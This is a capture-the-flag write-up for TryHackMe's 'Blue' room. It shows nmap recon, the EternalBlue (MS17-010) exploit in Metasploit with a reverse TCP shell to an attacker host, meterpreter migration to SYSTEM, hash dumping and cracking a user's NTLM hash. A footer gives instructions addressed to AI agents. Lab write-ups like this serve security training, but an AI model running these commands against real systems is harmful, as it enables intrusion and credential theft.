# Blue

![tryhackme.com - © TryHackMe](/files/tJ1nmhBpP5d28MPTPPHA)

***

## Intro

| Room Info            | ![](/files/rF2TXiJYX1oqGtech1Rg)        |
| -------------------- | --------------------------------------- |
| 🔗 Name              | [Blue](https://tryhackme.com/room/blue) |
| 🎯 Target IP         | `10.10.177.175`                         |
| 📈 Difficulty level  | 🟢Easy                                  |
| 💲 Subscription type | Free                                    |
| 🪟 OS                | Windows                                 |

***

## Recon

```bash
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175
```

***

## Exploitation

```bash
msfconsole -q
```

```bash
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run

background # or CTRL+Z
```

![](/files/On8SOLWk129M9w7GV56n)

***

## Privilege Escalation

* Used payload was `windows/x64/shell/reverse_tcp`, so convert the shell to a `meterpreter` shell.

```bash
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
run
```

![](/files/5a0NpUeslmknh2fidqUt)

```bash
sessions 5
getuid
	Server username: NT AUTHORITY\SYSTEM
ps
```

* My process may not run as `SYSTEM` user. Select a `PID` (process ID) with the `NT AUTHORITY\SYSTEM` user, and migrate my process to that one. `e.g.` 1284 - spoolsv.exe

```bash
migrate 1284
```

![](/files/YoSZ2tDrWeUbVSuOfLCA)

***

## Post Exploitation

### Cracking

```bash
hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:
```

`aad3b435b51404eeaad3b435b51404ee` is the LM hash for ***no password***.

```bash
echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txt
```

`ffb43f0de35be4d9917ac0cc8ad57f8d` is the NTLM hash for `alqfna22`.

Jon's credentials are `jon`:`alqfna22`.

![](/files/XSUowEJkcZM7uKrcZrmN)

## Flags

* 🚩 In the `meterpreter` session

```bash
cd C:\\
dir
cat flag1.txt
flag{*******************
```

![](/files/TUHZXeANY0ZGDlKfRKZk)

```bash
cd C:/Windows/System32/config
cat flag2.txt
flag{*****************************
```

![](/files/kK03goiVsuliSfX9ncID)

```bash
cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt
flag{********************************
```

![](/files/oIOBWFOVCoPQm7Oo48ce)

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.syselement.com/home/cyber-everything/writeups-walkthroughs/tryhackme/practice/easy/blue.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.